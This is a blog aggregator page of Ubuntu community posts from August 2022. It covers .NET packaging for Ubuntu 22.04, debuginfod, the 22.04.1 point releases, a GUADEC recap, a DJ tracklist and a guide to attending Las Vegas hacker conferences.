August 16, 2022

  • .NET developers are now able to install the ASP.NET and .NET SDK and runtimes from Ubuntu 22.04 LTS with a single “apt install” command
  • Canonical releases new, ultra-small OCI-compliant appliance images, without a shell or package manager, for both the .NET 6 LTS and ASP.NET runtimes
  • Microsoft and Canonical are collaborating to secure the software supply chain between .NET and Ubuntu and to provide enterprise-grade support

Canonical is proud to welcome the .NET development platform, one of Microsoft’s earliest contributions to open source projects, as a native experience on Ubuntu hosts and container images, starting in Ubuntu 22.04 LTS.

.NET developers will be able to start their Linux journey with Ubuntu, benefiting from timely security patches and new releases.

.NET 6 users and developers can now install the .NET 6 packages on Ubuntu with a simple apt install dotnet6 command. Optimised, pre-built, ultra-small container images are also now available to use out of the box.

.NET as an Ubuntu .deb package is the result of a close collaboration between Microsoft and Canonical. The two companies are working together to deliver timely security patches and new releases to Ubuntu. This is the foundation for more capabilities to follow for the open-source framework on Ubuntu, for hosts and minimised container images.

“Working with Canonical has enabled us to simultaneously deliver ease of use and improved security to .NET developers,” said Richard Lander, Program Manager, .NET. “The project benefits from Canonical’s leadership in the Linux ecosystem, and from Microsoft’s depth of experience on dev tools and platforms. The result is a combination of in-box packages and container images that will benefit community developers and large Enterprise customers alike through open source.”

“Ubuntu now has an end-to-end story from development to production with ultra-small supported container images, starting with the .NET platform”, said Valentin Viennot, Product Manager, Canonical. “We think it’s a huge improvement for both our communities; collaborating with the .NET team at Microsoft has enabled us to go above and beyond”.

Install .NET 6 on Ubuntu

With this new addition to Canonical’s repositories, installing and keeping .NET and ASP.NET up to date on Ubuntu 22.04 LTS is straightforward:

# quickly install a bundle with both the SDK and the runtime
sudo apt update && sudo apt install dotnet6
# or cherry-pick only the dependencies you need to develop or run
sudo apt install dotnet-sdk-6.0
sudo apt install dotnet-runtime-6.0
sudo apt install aspnetcore-runtime-6.0
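
Once installed, a quick sanity check confirms what apt pulled in (a minimal sketch; the exact version strings will vary with the point release you receive):

# verify the toolchain is on the PATH and list what was installed
dotnet --list-sdks
dotnet --list-runtimes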

Microsoft and Canonical: partnering for security

Software provenance is more critical than ever to all open source consumers. Open-source communities and enterprises both need to be confident in their software dependencies.

Canonical and Microsoft have worked together to share content with each other directly, with no intermediaries. “We now have what’s effectively a zero-distance supply chain for all Canonical assets”, said Richard Lander, .NET Program Manager at Microsoft.

Microsoft recently set up a distro maintainer group for .NET. Canonical is now a member of that group, helping to secure the software supply chain from source to packages.

Canonical’s software repositories continue to expand. Over 28,000 packages are available to date, with exclusive and extended security patching for Ubuntu Pro and Ubuntu Advantage subscribers, as well as for free community users.

Timely security patches and releases

.NET and Ubuntu’s long-term support (LTS) releases take place in different years but are neatly aligned: the .NET LTS ships in November of odd-numbered years, and the Ubuntu LTS ships in April of the following even-numbered year.

As a result, Ubuntu users will always have a fresh .NET LTS in each Ubuntu LTS series. This pairing is the logical choice for developers and software vendors, combining two secure and stable product releases to form a trusted foundation for their applications. Microsoft and Canonical are committed to working together to make sure that new .NET releases are available with new Ubuntu releases, and that they work well together.

Establishing the shortest trust chain between Microsoft and Canonical has been critical to building this partnership. The result is a straightforward developer experience, and a regular stream of security patches and updates.

Minimal OCI images: chiselling Ubuntu for .NET

The .NET development platform was one of Microsoft’s earliest contributions to open-source projects. Its community numbers more than 5 million .NET developers, many of whom are adopting Linux and Linux-based OCI containers at runtime.

Ubuntu has been a popular choice for developers using containers since the first days of Docker. Alongside the launch of .NET on Ubuntu, Canonical is also offering a new type of container image, composed of only the strict set of packages and files required at runtime.

These “chiselled” images – so-called because everything not needed to provide a minimal Ubuntu image optimised for OCI containers has been cut away – address developer feedback around attack surface and image size, without sacrificing Ubuntu’s stability and familiarity.

So far, this process has cut 100MB away, delivering the smallest Ubuntu-based OCI image ever published at less than 6MB (compressed). Canonical’s goal is to deliver the smallest footprint ever achieved in an OCI image, while still providing known and trusted Ubuntu content.

Canonical has released into beta two new Ubuntu-based OCI images for .NET 6, maintained as part of the existing portfolio of LTS images:

These first chiselled Ubuntu images for the .NET and ASP.NET runtimes are also available from Microsoft via the Microsoft Artifact Registry (MCR).
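
As a rough sketch of what trying one looks like (the repository name and tag below are illustrative; check Docker Hub or MCR for the current ones), pulling a chiselled runtime image and checking its size takes two commands:

# pull a chiselled .NET runtime image and inspect its size
docker pull ubuntu/dotnet-runtime:6.0-22.04_beta
docker images ubuntu/dotnet-runtime
# note: chiselled images ship no shell, so "docker run -it ... bash" fails by design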

What’s next?

This project is the first of a series of projects Canonical has planned for .NET and Ubuntu. Read more about this partnership on Microsoft’s blog.

.NET deb packages are now in Ubuntu Jammy 22.04 LTS for the x64 architecture and will soon be available for the Arm64 architecture as well as on all newer Ubuntu releases.

Pre-built container images are already available on the Azure Container Registry and on Docker Hub:

More resources:

on August 16, 2022 12:55 PM

August 15, 2022

Welcome to the Ubuntu Weekly Newsletter, Issue 748 for the week of August 7 – 13, 2022. The full version of this issue is available here.

In this issue we cover:

The Ubuntu Weekly Newsletter is brought to you by:

  • Krytarik Raido
  • Bashing-om
  • Chris Guiver
  • Wild Man
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, this issue of the Ubuntu Weekly Newsletter is licensed under a Creative Commons Attribution ShareAlike 3.0 License

on August 15, 2022 11:12 PM

August 14, 2022

Debuginfod is coming to Ubuntu

Sergio Durigan Junior

These past couple of months I have been working to bring debuginfod to Ubuntu. I thought it would be a good idea to make this post and explain a little bit about what the service is and how I'm planning to deploy it.

A quick recap: what's debuginfod?

Here's a good summary of what debuginfod is:

debuginfod is a new-ish project whose purpose is to serve
ELF/DWARF/source-code information over HTTP.  It is developed under the
elfutils umbrella.  You can find more information about it here:

  https://sourceware.org/elfutils/Debuginfod.html

In a nutshell, by using a debuginfod service you will not need to
install debuginfo (a.k.a. dbgsym) files anymore; the symbols will be
served to GDB (or any other debuginfo consumer that supports debuginfod)
over the network.  Ultimately, this makes the debugging experience much
smoother (I myself never remember the full URL of our debuginfo
repository when I need it).

If you follow the Debian project, you might know that I run their debuginfod service. In fact, the excerpt above was taken from the announcement I made last year, letting the Debian community know that the service was available.
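
For the curious, consuming a debuginfod service is just a matter of exporting one environment variable before starting your debugger. A minimal sketch using Debian's public instance mentioned above (Ubuntu's own endpoint was not yet public at the time of writing):

# tell GDB (and other libdebuginfod consumers) where to fetch symbols
export DEBUGINFOD_URLS="https://debuginfod.debian.net"
gdb /usr/bin/gzip    # symbols and sources are downloaded on demand and cached locally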

First stage

With more and more GNU/Linux distributions offering a debuginfod service to their users, I strongly believe that Ubuntu cannot afford to stay out of this "party" anymore. Fortunately, I have a manager who not only agrees with me but also turned the right knobs in order to make this project one of my priorities for this development cycle.

The deployment of this service will be made in stages. The first one, whose results are due to be announced in the upcoming weeks, encompasses indexing and serving all of the available debug symbols from the official Ubuntu repository. In other words, the service will serve everything from main, universe and multiverse, from every supported Ubuntu release out there.

This initial (a.k.a. "alpha") stage will also allow us to have an estimate of how much the service is used, so that we can better determine the resources allocated to it.

More down the road

This is just the beginning. In the following cycles, I will be working on a few interesting projects to expand the scope of the service and make it even more useful for the broader Ubuntu community. To give you an idea, here is what is on my plate:

  • Working on the problem of indexing and serving source code as well. This is an interesting problem and I already have some ideas, but it's also challenging and may unfold into more sub-projects. The good news is that a solution for this problem will also be beneficial to Debian.

  • Working with the snap developers to come up with a way to index and serve debug symbols for snaps as well.

  • Improving the integration of the service into Ubuntu. In fact, I have already started working on this by making elfutils (actually, libdebuginfod) install a customized shell snippet to automatically set up access to Ubuntu's debuginfod instance.

As you can see, there's a lot to do. I am happy to be working on this project, and I hope it will be helpful and useful for the Ubuntu community.

on August 14, 2022 04:00 AM

August 12, 2022

The Ubuntu team is pleased to announce the release of Ubuntu 22.04.1 LTS (Long-Term Support) for its Desktop, Server, and Cloud products, as well as other flavours of Ubuntu with long-term support.

As usual, this point release includes many updates, and updated installation media has been provided so that fewer updates will need to be downloaded after installation. These include security updates and corrections for other high-impact bugs, with a focus on maintaining stability and compatibility with Ubuntu 22.04 LTS. 22.04.1 also brings new RISC-V platform support, providing fresh images for the Allwinner Nezha and StarFive VisionFive boards.

Kubuntu 22.04.1 LTS, Ubuntu Budgie 22.04.1 LTS, Ubuntu MATE 22.04.1 LTS, Lubuntu 22.04.1 LTS, Ubuntu Kylin 22.04.1 LTS, Ubuntu Studio 22.04.1 LTS, and Xubuntu 22.04.1 LTS are also now available. More details can be found in their individual release notes (see ‘Official flavours’):

https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668

Maintenance updates will be provided for 5 years for Ubuntu Desktop, Ubuntu Server, Ubuntu Cloud, and Ubuntu Core. All the remaining flavours will be supported for 3 years. Additional security support is available with ESM (Extended Security Maintenance).

To get Ubuntu 22.04.1 LTS

In order to download Ubuntu 22.04.1 LTS, visit:

https://ubuntu.com/download

Users of Ubuntu 20.04 LTS will soon be offered an automatic upgrade to 22.04.1 LTS via Update Manager. For further information about upgrading, see:

https://ubuntu.com/tutorials/upgrading-ubuntu-desktop
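
If you would rather not wait for the graphical prompt, the upgrade can also be started from a terminal. A minimal sketch (take a backup first; the upgrade is offered once 22.04.1 is marked as the upgrade target):

# install all pending updates, then start the LTS-to-LTS upgrade
sudo apt update && sudo apt upgrade
sudo do-release-upgrade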

As always, upgrades to the latest version of Ubuntu are entirely free of charge.

We recommend that all users read the 22.04.1 LTS release notes, which document caveats and workarounds for known issues, as well as more in-depth notes on the release itself. They are available at:

https://discourse.ubuntu.com/t/jammy-jellyfish-release-notes/24668

If you have a question, or if you think you may have found a bug but aren’t sure, you can try asking in any of the following places:

#ubuntu on irc.libera.chat
https://lists.ubuntu.com/mailman/listinfo/ubuntu-users
https://ubuntuforums.org
https://askubuntu.com

Help Shape Ubuntu

If you would like to help shape Ubuntu, take a look at the list of ways you can participate at:

https://discourse.ubuntu.com/contribute

About Ubuntu

Ubuntu is a full-featured Linux distribution for desktops, laptops, clouds and servers, with a fast and easy installation and regular releases. A tightly-integrated selection of excellent applications is included, and an incredible variety of add-on software is just a few clicks away.

Professional services including support are available from Canonical and hundreds of other companies around the world. For more information about support, visit:

https://ubuntu.com/support

More Information

You can learn more about Ubuntu and about this release on our website listed below:

https://ubuntu.com/

To sign up for future Ubuntu announcements, please subscribe to Ubuntu’s very low volume announcement list at:

https://lists.ubuntu.com/mailman/listinfo/ubuntu-announce

Originally posted to the ubuntu-announce mailing list on Thu Aug 11 13:27:42 UTC 2022 by Łukasz ‘sil2100’ Zemczak on behalf of the Ubuntu Release Team

on August 12, 2022 12:06 PM

The first point release update to Kubuntu 22.04 LTS (Jammy Jellyfish) is out now. This contains all the bug-fixes added to 22.04 since its first release in April 2022. Users of 22.04 can run the normal update procedure to get these bug-fixes.

The first point release is also significant because it is the default upgrade version for users of Kubuntu 20.04 LTS (Focal Fossa).

See the Ubuntu 22.04.1 LTS Release Announcement, the Ubuntu 22.04.1 Release Notes, and the Kubuntu Release Notes.

Download all available released images.

on August 12, 2022 11:34 AM

August 11, 2022

Thanks to all the hard work from our contributors, Lubuntu 22.04.1 LTS has been released. With the codename Jammy Jellyfish, Lubuntu 22.04 is the 22nd release of Lubuntu and the eighth with LXQt as the default desktop environment. Support lifespan: Lubuntu 22.04 LTS will be supported for 3 years, until April 2025. Our […]
on August 11, 2022 02:34 PM

Whether you’re a first-time Linux user, experienced developer, academic researcher or enterprise administrator, Ubuntu 22.04 LTS is the best way to upgrade your creativity, productivity and downtime. Check out our new video to learn more!

The release of Ubuntu 22.04.1 LTS represents the consolidation of fixes and improvements identified during the initial launch of Ubuntu 22.04 LTS and is the first major milestone in our Long Term Support (LTS) commitment to our users.

From today, Ubuntu 22.04.1 LTS is available to download and install from our download page.

Users of Ubuntu 20.04 LTS  will shortly be prompted to upgrade to 22.04 LTS directly from their desktop, either automatically or as part of a scheduled update. This is a great time to start exploring Ubuntu 22.04 LTS – to read more on why it’s our best version yet, check out our launch day blog post, or keep reading for a summary of the most exciting developments.

User experience and performance enhancements


GNOME 42 delivers a polished and intuitive desktop experience, with new touchpad gestures and power management tools as well as support for triple buffering, which significantly improves performance. Our default browser, Firefox, has also had a number of updates to reduce startup times since the release of 22.04.

Read more about the new features in Ubuntu Desktop 22.04 LTS>

Upgrade your productivity, enjoy your downtime

Development and data science tooling

Ubuntu is the target platform for open source software vendors and community projects. Ubuntu 22.04 LTS ships with the latest toolchains for Python, Rust, Ruby, Go, PHP and Perl, and users get first access to the latest updates for key libraries and packages.

In fields such as data science and machine learning, Ubuntu is the OS of choice for many of the most popular frameworks. This includes OpenCV, TensorFlow, Keras, PyTorch and Kubeflow, as well as tools like the NVIDIA data science stack, which enables GPU-accelerated data science workloads to be run locally before deploying to the cloud.

Gaming and content creation 

As the Linux gaming ecosystem continues to expand, Ubuntu remains the most popular Linux OS for gaming. We include the latest NVIDIA drivers and Ubuntu supports key gaming apps, such as our new early access Steam snap, alongside a number of content creation tools including Kdenlive, Discord and OBS Studio.

For game developers, AI/ML researchers and robotics engineers looking for a simulation environment, Ubuntu 22.04 LTS is the recommended Linux distro for the Unreal Engine which is now available to download as a precompiled binary.

Use it on new, certified hardware


The Ubuntu certification program partners closely with leading OEMs to certify Ubuntu Desktop across a range of laptops, desktops and workstations. This ensures that Ubuntu Certified devices work out-of-the-box with hardware specific optimisations that are applied whether you purchase a device with Ubuntu preloaded or install Ubuntu after-the-fact.

The first device to be certified for Ubuntu Desktop 22.04 LTS is the Dell XPS 13 Plus Developer Edition, Dell’s most powerful 13-inch laptop.

The Dell XPS 13 Plus Developer Edition is available to buy with Ubuntu 22.04 LTS pre-installed this month in the U.S., Canada and select countries across Europe.

Introducing the XPS 13 Plus Developer Edition>

Read more about our certified hardware>

Enterprise-ready with Ubuntu Advantage


Ubuntu Advantage is Canonical’s comprehensive subscription delivering enterprise-grade security, management tooling, and extended security patching for 10 years. 

Ubuntu 22.04 LTS introduces advanced management options for Ubuntu Advantage subscribers in Microsoft-centric organisations.

New Active Directory integration features ensure that IT managers can use the same tools to manage their Ubuntu and Windows devices. These include extended Group Policy Object support, privilege management and remote script execution via ADSys.

You can get a personal Ubuntu Advantage licence free of charge using your Ubuntu SSO account.

Read more about our Active Directory integration>

Read more about Ubuntu Desktop for organisations>

Get started today

To get started with Ubuntu 22.04 LTS, visit:

Download Ubuntu Desktop>

Install Ubuntu Desktop>

Upgrade Ubuntu Desktop>

To join the conversation and engage with Ubuntu community members around the globe, check out:

Ubuntu Discourse>

Ask Ubuntu>

on August 11, 2022 12:56 PM

E208 Gerardo Lisboa (Parte 2)

Podcast Ubuntu Portugal

At the start of our holidays, we sat down to talk with Gerardo Lisboa, president of ESOP, the Portuguese Association of Open Source Software Companies. This is the second part of the conversation. You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links: when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get everything for 15 dollars, or different parts of it depending on whether you pay 1 or 8. We think this is worth well more than 15 dollars, so if you can, pay a little more, since you have the option to pay whatever you want. If you are interested in other bundles not listed in the notes, use the link https://www.humblebundle.com/?partner=PUP and you will be supporting us too.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and its open source code is licensed under the terms of the MIT License. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License. This episode and the image used are licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) licence, whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorisation.

on August 11, 2022 12:00 AM

August 10, 2022

GUADEC 2022

Dylan McCall

I spent a week at GUADEC 2022 in Guadalajara, Mexico. It was an excellent conference, with some good talks, good people, and a delightful hallway track. I think everyone was excited to see each other in person after so long, and for many attendees, this was closer to home than GUADEC has ever been.

For this event, I was sponsored by the GNOME Foundation, so many thanks to them as well as my employer the Endless OS Foundation for both encouraging me to submit a talk and for giving me the opportunity to take off and drink tequila for the week.

For me, the big themes this GUADEC were information resilience, scaling our community, and how these topics fit together.


Introductions

Stepping into the Guadalajara Connectory for the first time, I couldn’t help but feel a little out of place. Everyone was incredibly welcoming, but this was still my first GUADEC, and my first real in-person event with the desktop Linux community in ages.

So, I was happy to come across Jona Azizaj and Justin Flory’s series of thoughtful and inviting workshops on Wednesday morning. These were Icebreakers & Community Social, followed by Unconscious bias & imposter syndrome workshop. They eased my anxiety enough that I wandered off and missed the follow-up (Exploring privilege dynamics workshop), but it looked like a cool session. It was a brilliant idea to put these kinds of sessions right at the start.

The workshop about unconscious bias inspired me to consciously mix up who I was going out for lunch with throughout the week, as I realized how easy it is to create bubbles without thinking about it.

Beyond that, I attended quite a few interesting sessions. It is always fun hearing about bits of the software stack I’m unfamiliar with, so some standouts were Matthias Clasen’s Font rendering in GNOME (YouTube), and David King’s Cheese strings: Webcams, PipeWire and portals (YouTube). Both highly recommended if you are interested in those components, or in learning about some clever things!

But for the most part, this wasn’t a very code-oriented conference for me.

Accessibility, diversity, remote attendance

This was the first hybrid GUADEC after two years of running a virtual-only conference, and I think the format worked very well. The remote-related stuff was smoothly handled in the background. The volunteers in each room did a great job relaying questions from chat so remote attendees were represented during Q&As.

I did wish that those remote attendees — especially the Berlin Mini-GUADEC — were more visible in other contexts. If this format sticks, it would be nice to have a device or two set up so people in different venues can see and interact with each other during the event. After all, it is unlikely that in-person attendees will spend much time looking at chat rooms on their own.

But I definitely like how this looks. I think having good representation for remote attendees is important for accessibility. Pandemic or otherwise. So with that in mind, Robin Tafel’s Keynote: Peeling Vegetables and the Craft of (Software) Inclusivity (YouTube), struck a chord for me. She elegantly explains how making anything more accessible — from vegetable peelers to sidewalks to software — comes back to help all of us in a variety of ways: increased diversity, better designs in general, and — let’s face it — a huge number of people will need accessibility tools at some point in their lives.

“We are temporarily abled.”

Community, ecosystems, and offline content

I especially enjoyed Sri Ramkrishna’s thoughtful talk, GNOME and Sustainability – Ecosystem Management (YouTube). I came away from his session thinking how we don’t just need to recruit GNOME contributors; we need to connect free software ecosystems horizontally. Find those like-minded people in other projects and find places where we can collaborate, even if we aren’t all using GNOME as a desktop environment. For instance, I think we’re doing a great job of this across the freedesktop world, but it’s something we could think about more widely, too.

Who else benefits, or could benefit, from Meson, BuildStream, Flatpak, GJS, and the many other technologies GNOME champions? How can we advocate for these technologies in other communities and use those as bridges for each other’s benefit? How do we get their voices at events like GUADEC, and what stops us from lending our voices to theirs?

“We need to grow and feed our ecosystem, and build relations with other ecosystems.”

So I was pretty excited (mostly anxious, since I needed to use printed notes and there were no podiums, but also excited) to be doing a session with Manuel Quiñones a few hours later: Offline learning with GNOME and Kolibri (YouTube). I’ll write a more detailed blog post about it later on, but I didn’t anticipate quite how neatly our session would fit in with what other people were talking about.

At Endless, we have been working with offline content for a long time. We build custom Endless OS images designed for different contexts, with massive libraries of pre-installed educational resources. Resources like Wikipedia, books, educational games, and more: all selected to empower people with limited connectivity. The trick with offline content is it involves a whole lot of very large files, it needs to be possible to update it, and it needs to be easy to rapidly customize it for different deployments.

That becomes expensive to maintain, which is why we have started working with Kolibri.

Kolibri is an open source platform for offline-first teaching and learning, with a powerful local application and a huge library of freely licensed educational content. Like Endless OS, it is designed for difficult use cases. For example, a community with sporadic internet access can use Kolibri to share Khan Academy videos and exercises, as well as assignments for individual learners, between devices.

Using Kolibri instead of our older in-house solution means we can collaborate with an existing free software project that is dedicated to offline content. In turn, we are learning many interesting lessons as we build the Kolibri desktop app for GNOME. We hope those lessons will feed back into the Kolibri project to improve how it works on other platforms, too.

Giving our talk at GUADEC made me think about how there is a lot to gain when we bring these types of projects together.

The hallway track

Like I wrote earlier, this wasn’t a particularly code-oriented conference for me. I did sit down and poke at Break Timer for a while — in particular, reviving a branch with a GTK 4 port — and I had some nice chats about various other projects people are doing. (GNOME Crosswords was the silent star of the show). But I didn’t find many opportunities to actively collaborate on things. Something to aim for with my next GUADEC.

I wonder if the early 3pm stop each day was a bit of a contributing factor there, but it did make for some excellent outings, so I’m not complaining. The pictures say a lot!

Everyone here is amazing, humble and kind. I really cannot recommend it enough: if you are interested in GNOME, check out GUADEC, or LAS, or another such event. It was tremendously valuable to be here and meet such a wide range of GNOME users and contributors. I came away with a better understanding of what I can do to contribute, and a renewed appreciation for this community.

on August 10, 2022 07:43 PM

August 08, 2022

https://www.mixcloud.com/dholbach/saturday-noon-at-para-yok-festival/

Para Yok Festival! The beautiful summer called for tropical and summery vibes, so that’s what you are going to find here! It was a lovely event and I had been looking forward to playing some of these tunes for a long time! Thanks a lot to everyone who made this a very special weekend! 💖

Unfortunately the set was fraught with complications - I had to replace parts of the equipment 💻🎛💥 … and deal with other difficulties in between. Anyway, it’s a bit of a wild mix, but all the tracks are in my favourite category.

  1. Twerking Class Heroes - Hustlin'
  2. Claudia - Deixa Eu Dizer (iZem ReShape)
  3. Mc Loma e as Gêmeas Lacração - Predadora
  4. Thiaguinho MT feat Mila e JS O Mão de Ouro - Tudo OK
  5. MC Ysa - Baile da Colômbia (Brega Funk) (Remix)
  6. Daniel Haaksman - Toma Que Toma (Waldo Squash Remix)
  7. Gang Do Eletro - Pith Bull
  8. Banda Uó - Cremosa
  9. Sofi Tukker - Purple Hat
  10. Nick León - Latigazo
  11. Tribilin Sound - Condorcanqui
  12. – Break –
  13. Omar ؏ - Dola Re Dola
  14. Yendry - Ki-Ki
  15. TNGHT & M.I.A. - BAD GOOOORLS (BAVR RMX)
  16. The Living Graham Bond - Werk
  17. Kalemba - Wegue Wegue (Krafty Kuts Remix)
  18. Zeds Dead - Rumble In The Jungle
  19. Bert On Beats - Arriba
  20. Baja Frequencia - O Galop
  21. Sango - Fica Caladinha (K-Wash Remix)
  22. Castro - Warning
  23. Daniel Haaksman - Copabanana
  24. Dj Djeff e Maskarado - Elegom Bounsa
  25. London Afrobeat Collective - Prime Minister (Captain Planet Remix)
  26. Omar ft Zed Bias - Dancing
  27. Rafi El - Bacanal
  28. The Chemical Brothers - Go (Claude VonStroke Remix)
  29. nicholas ryan gant - Gypsy Woman (Kaytronik Remix Extended Version)
  30. Kurd Maverick - Dancing To (Extended Mix)
  31. Kotelett - I Got Something For You
  32. Sanoi & Rattler - Walking
  33. Dino Lenny - Tokyo (Damon Jee Remix)
  34. Quantic - You Used to Love Me feat. Denitia (Selva Remix)
  35. Psychemagik - Mink & Shoes feat Navid Izadi
  36. Noir & Haze - Around (Solomon remix)
  37. Emanuelle - Italove
on August 08, 2022 06:20 AM

August 04, 2022

E207 Gerardo Lisboa (Parte 1)

Podcast Ubuntu Portugal

At the start of our holidays, we sat down to talk with Gerardo Lisboa, president of ESOP, the Portuguese Association of Open Source Software Companies. This is the first part of the conversation; there’s more next week! You know the drill: listen, subscribe and share!

Support

You can support the podcast using the Humble Bundle affiliate links: when you use those links to make a purchase, part of what you pay goes to Podcast Ubuntu Portugal. You can get everything for 15 dollars, or different parts of it depending on whether you pay 1 or 8. We think this is worth well more than 15 dollars, so if you can, pay a little more, since you have the option to pay whatever you want. If you are interested in other bundles not listed in the notes, use the link https://www.humblebundle.com/?partner=PUP and you will be supporting us too.

Attribution and licences

This episode was produced by Diogo Constantino, Miguel and Tiago Carrondo and edited by Senhor Podcast. The website is produced by Tiago Carrondo and its open source code is licensed under the terms of the MIT License. The theme music is “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)” by Alpha Hydrae, licensed under the CC0 1.0 Universal License. This episode and the image used are licensed under the Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0) licence, whose full text can be read here. We are open to licensing for other kinds of use; contact us for validation and authorisation.

on August 04, 2022 12:00 AM

July 20, 2022

It’s that time of year again – Hacker Summer Camp. (Hacker Summer Camp is the ~weeklong period where several of the largest hacker/information security conferences take place in Las Vegas, NV, including DEF CON and Black Hat USA.) This will be the 3rd year in a row where it takes place under the spectre of a worldwide pandemic, and the first one to be fully in-person again. BSidesLV has returned to in-person, DEF CON is in-person only, Black Hat will be in full swing, and Ringzer0 will be offering in-person trainings. It’s almost enough to forget there’s still an ongoing pandemic.

I did attend last year’s hybrid DEF CON in person, and I’ve been around a few times, so I wanted to share a few tidbits, especially for first timers. Hopefully it’s useful to some of you.

Conferences/Events

  • DEF CON is arguably the preeminent event of the week. By far the largest by attendance, it also brings the greatest variety in hackers to the event. Ranging from students just getting into the scene to seasoned hackers with decades of experience to industry professionals, the networking opportunities are limitless. The talks are generally high quality, though they can be a bit of a mixed bag sometimes. Some will teach/demonstrate great things, and I always find a few worth watching, even if only when they get published on YouTube.

    There are “villages” for every topic and space – voting machines, hardware hacking, Red Teaming, IoT, lockpicking, social engineering, and more. The villages allow niche areas of hacking to showcase their special interests, and are generally run by individuals with a pure passion for their field. If you want to know more about a particular subfield of hacking, there is no better way than finding the right village.

    For the more competitive type, there’s a variety of competitions. In addition to the main “DEF CON CTF”, there’s also typically smaller CTFs in the Contest area or individual villages, so those looking for a challenge can put their skills to the test. Other competitions in the past have included a scavenger hunt, a password cracking competition, a beverage cooling competition, and more.

    In the evening, there’s a variety of activities from parties/concerts to “Hacker Jeopardy” – a very mature take on Jeopardy! with a hacker theme. There’s also plenty of private parties and places to hang out with fellow hackers all evening long.

    You may also hear people refer to “the badge” when talking about admission to the conference. While other conferences usually talk about registration or a ticket and have some boring piece of paper to present as your admission, DEF CON badges have become a work of art. Approximately every other year, the badge is electronic and has microcontrollers and some electronic function. Though in theory DEF CON 30 should be a “passive” year, the creators of the badge (MK Factor) have confirmed that it will be electronic this year. (Check out the linked interview if you’re curious.)

    New this year are DEF CON Trainings. These take place after DEF CON and provide an opportunity to get high-quality training associated with the conference. They’re all 2-day trainings, but they appear to be good value for money in comparison to many other commercial training offerings.

  • Black Hat is the premier security industry conference. I differentiate it from a hacking conference in that most of the people who are there will be people who strictly work in the industry and far fewer who are hackers just for the fun of it. Part of this is the cost (at least an order of magnitude more than DEF CON), and part of this is the general atmosphere. Polo shirts are the order of the day instead of black t-shirts and mohawks.

    There’s lots of high-quality technical material, but also a vendor sales floor with all the sales pitches you can possibly imagine. (But this is also where you can get free SWAG and party invites, so it’s not all terrible news.)

    Black Hat also has a multitude of training opportunities. In fact, Black Hat USA is likely the largest single site training event for the information security space each year. There’s trainings for every background and skill level, for all kinds of specialities, and in both 2- and 4-day formats.

  • BSidesLV is the B-Side to Black Hat. A community conference through-and-through, it has many similarities to the DEF CON of many years ago, but with a little more chill attitude. BSides is a great opportunity for new speakers as well as those who want to interact with fellow hackers in a more chill and (slightly) smaller atmosphere – though it’s gotten quite busy itself over the years. BSides takes over all the conference space at the Tuscany, and most of the hotel rooms, so it’s a great opportunity to be completely immersed in the hacker scene.

  • The Diana Initiative is “A conference committed to helping all those underrepresented in Information Security.” In the past, it’s been a 1 day or 1/2 day affair, but now it’s becoming a 2 day event, and I’m so happy to see such an important topic getting more love.

  • Ringzer0 is a training-only event focusing predominantly on reverse engineering and exploitation. It provides a nice alternative to Black Hat trainings (it’s the same days, but an independent event). The trainings offered here seem much more specific than Black Hat trainings, and I’m planning to take one, so I’ll have a review here after the event.

Planning

The biggest single piece of advice I can offer is: don’t try to do everything. You can’t do it, and managing your energy is actually an important part of the week, especially if you’re attending multiple of the conferences during the week.

Beyond that, I encourage you to think about what you hope to get out of your time. If you’d like to try out contests, pick out one or maybe two and focus on them. If you’re looking for a new role or wanting to meet new people, find social opportunities. If you’re looking to expand your skills in a particular direction, identify all of the relevant content in the area.

I’ve had years where I tried to do too much and ended the week feeling I’d done nothing at all. I typically prioritize interactive events – contests, meeting people, etc. – over talks, because the talks will be recorded and available later, unless a talk is something I plan to immediately apply. At the bigger events (DEF CON and Black Hat) the audience is likely to be so large that even if you have questions, it will be hard to get them answered by the speaker.

Logistics

Quite frankly, the best time to plan hotel and airfare has probably already passed, but the 2nd best time to plan them is right now. I expect both will only rise in price from this point forward. Unfortunately, prices have been very volatile this summer. As of writing, the following group rates for hotels are still available:

  • DEF CON Room Block – Note that this year, DEF CON is at Caesar’s Forum, which is a new conference center located behind the Linq and Harrah’s. (It is attached to these two hotels by a skybridge.)
  • The Tuscany is the off-strip resort that hosts BSidesLV. They still have a number of rooms available, and most of the guests at the hotel will be fellow hackers during the course of the week.
  • Black Hat has rates at the Mandalay Bay. I’d only recommend this if you’ll be attending Black Hat, however, as it’s at the far south end of the strip.
  • Ringzer0 has a special rate for those attending their training at Park MGM. One feature of this hotel is that the entire thing is Non-Smoking. Along with Vdara and the Delano, this is an unusual quality on the strip and great for those with allergies.

Airfare is obviously highly dependent on where you are originating. If it’s not too far and airfare looks a bit pricey for you, check out whether anyone from a local DEF CON Group is driving and maybe you can split the gas and make a new friend! There’s also ride and room share threads on the DEF CON Forum. While there’s obviously good reasons to be careful of who you ride or room with, lots of people have had success and met new friends along the way.

Bringing Tech

Some people want to spend the whole week hacking. Some want to be hands-off keyboard the whole week. You might be somewhere in between. What you want to do during the week will dictate a lot of the tech you bring with you.

Since I will be attending a training event and enjoy playing in the contests/CTFs, I will necessarily be bringing a laptop with me – in this case, my Framework Laptop that I love. (Full review of that coming soon.) I have a 1TB SSD which should be enough for VMs for training and CTFs as well, but I’ll probably also bring along an external SSD for sharing resources. They’re light enough that the speed advantage over a typical flash drive is worth it.

If you do intend to take a training or play a CTF for more than a little bit, I can’t recommend a wireless mouse enough. Even the great trackpad on Macbooks just doesn’t feel as good to me as a mouse after a few hours.

Outlets can also be quite limited, so if you bring a travel power strip, you can always squeeze in where someone else has plugged in and even provide more outlets. Sharing is caring!

